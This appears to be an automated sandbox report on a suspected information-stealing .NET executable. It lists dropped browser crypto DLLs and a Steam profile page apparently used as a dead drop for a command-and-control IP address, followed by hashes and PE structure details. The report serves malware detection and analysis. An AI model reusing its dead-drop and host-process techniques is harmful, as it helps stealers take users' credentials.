                                                                                      Preview:MDMP..a..... .......e..f........................."..(.......$....+..........pY..........`.......8...........T............l...;...........+...........-..............................................................................eJ......l.......GenuineIntel............T.......p...>..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER261E.tmp.WERInternalMetadata.xml

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6320
                                                                                      Entropy (8bit):3.71879911668173
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJ5f6KSY3JwNQuprt89bm1FWsfWim:R6lXJR6KSY3Je2mFfK
                                                                                      MD5:2811834BE69DE85B6DD494C81967D4ED
                                                                                      SHA1:FAA56C5638ED8962EAFF58682B0190BD239EF369
                                                                                      SHA-256:4423B8F9556E9EA4733584C61460D9030357D18ED5D0E9761DC1AC4D03DF7381
                                                                                      SHA-512:0392407842F63C4E650ABC391C7105E3AE89BE261EB4B51E77402D6799F1A033C535A4075485FE31E019E09FE0E9228425C91355346FA33EB0389BDA3A8FD1EB
                                                                                      Malicious:false
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.1.2.<./.P.i.

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER264E.tmp.xml

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4642
                                                                                      Entropy (8bit):4.456741537769156
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsYJg77aI9PUWpW8VYRvYm8M4JMDF2+q8+1mLNd:uIjfeI7hN7VpJTvmLNd
                                                                                      MD5:A5DC245F37FA7BD81CAFC70F7E1DC051
                                                                                      SHA1:ED03A7E9A2832B21E3FEB321BA8749599EBA07C1
                                                                                      SHA-256:60A85D26AEA0A74D9F11B083BCEC178ECEB5A7124C84901D83A2CA98EC3613B4
                                                                                      SHA-512:ACE6E5B895E701D36ACA3CF18606E4B64E1B8FE75818257C6148433F181AC8AF83FD34CC3A488CE1C18173EC2B4A4584CD48FD37E2ADDEB5E021094B01C4B8D6
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427221" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                      C:\ProgramData\freebl3.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):685392
                                                                                      Entropy (8bit):6.872871740790978
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: Bootstrapper.exe, Detection: malicious, Browse
                                                                                      • Filename: azeyNF3kkf.exe, Detection: malicious, Browse
                                                                                      • Filename: Setup .exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: Nin6JE44ky.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\mozglue.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):608080
                                                                                      Entropy (8bit):6.833616094889818
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: Bootstrapper.exe, Detection: malicious, Browse
                                                                                      • Filename: azeyNF3kkf.exe, Detection: malicious, Browse
                                                                                      • Filename: Setup .exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: Nin6JE44ky.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\msvcp140.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):450024
                                                                                      Entropy (8bit):6.673992339875127
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\nss3.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2046288
                                                                                      Entropy (8bit):6.787733948558952
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\softokn3.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):257872
                                                                                      Entropy (8bit):6.727482641240852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\vcruntime140.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):80880
                                                                                      Entropy (8bit):6.920480786566406
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):522
                                                                                      Entropy (8bit):5.358731107079437
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                      MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                      SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                      SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                      SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                      Malicious:true
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199747278259[1].htm

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):34725
                                                                                      Entropy (8bit):5.399366384270716
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:/dpqm+0Ih3tAA9CWGVGfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2A:/d8m+0Ih3tAA9CWGVGFJTBv++nIjBtPM
                                                                                      MD5:B2B09AFC6B2D5E26DB1CD4A772DED343
                                                                                      SHA1:02D5F08CCE04596AC9678C08C6ED38340793A399
                                                                                      SHA-256:2068F0E24F17277971C0253BE92F51B10434D517C24B807A5F3BF92BF335834F
                                                                                      SHA-512:A89D84CCB823021E16D9069394D294C8AEFC1E16EB166D63EE781DB2423B37B8DD576C5A032E57A24CE78458D1B550B0E090FD66768B7004C7803E27DA6CC7E4
                                                                                      Malicious:false
                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://5.75.212.60|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href

                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.466378053160432
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:HIXfpi67eLPU9skLmb0b4OWSPKaJG8nAgejZMMhA2gX4WABl0uNddwBCswSb+:oXD94OWlLZMM6YFH7++
                                                                                      MD5:761026465D86AAEC7AFDEFAF9E4980D2
                                                                                      SHA1:C20012E19A0D484E0431BCD3B967C94D8031A175
                                                                                      SHA-256:721E5282C547F74D17CFE2151AECCD85E1A6C22A1203301B12E2E93823922E37
                                                                                      SHA-512:2A4FF4179A88E621083C1271621CB7A2FF831E847752BD5B34EF365FC2A9807B9AFEC2D24620C3C7AA875D1382268CA859640D132C57076E340A04BFF795CED0
                                                                                      Malicious:false
                                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.z..................................................................................................................................................................................................................................................................................................................................................>.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.233439891636296
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                      File name:file.exe
                                                                                      File size:6'581'760 bytes
                                                                                      MD5:4ea39e58d5185ea13c816062f97e001d
                                                                                      SHA1:4835b4fce547469ea200fc05f9bdfcfdc7572469
                                                                                      SHA256:1193d78ae12a46941717ff875f19ab33ce9f51f9c4ca3ef3b125abbc37560d62
                                                                                      SHA512:335997a137fb1c6d098f64743423b850a3937d24fb12e853aeb21e0fd2d2676cf1d38c1e4edd497cc485803efe5e79ec4f06799b11f3604234848019875f59c0
                                                                                      SSDEEP:98304:hr4lloZBIWWuOUG7B3bsOtzNy4ople5yjPWruqLa/:x4lyZaAG7B3jNdG4gPui
                                                                                      TLSH:BA66AE063250CB22C06E4633CADF842857FDEE107B53DA2B7D9AB35D65563A9090F2DE
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................|c.........N.c.. ....c...@.. ........................d...........@................................

                                                                                      File Icon

                                                                                      Icon Hash:0b20282042e2e245

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0xa39a4e
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x66A21315 [Thu Jul 25 08:55:49 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x639a000x4b.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x63c0000xe6b8.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x64c0000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x6399ac0x1c.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x637a540x637c00a747dfc55d7463dfdfc339c900dda157unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .sdata0x63a0000x2ca0x40070381d5d0defd5e396e895c4c996b608False0.5966796875data4.74641082995765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x63c0000xe6b80xe800ac6fe9214228fd9839de4d50c9d87a33False0.622002963362069data6.334964896630286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x64c0000xc0x2002da5a7030dfa9fd1e09c672880cef8abFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0x63c1f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.6117021276595744
                                                                                      RT_ICON0x63c6580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.4174484052532833
                                                                                      RT_ICON0x63d7000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.34221991701244814
                                                                                      RT_ICON0x63fca80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.310049598488427
                                                                                      RT_ICON0x643ed00x621cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9955406911928651
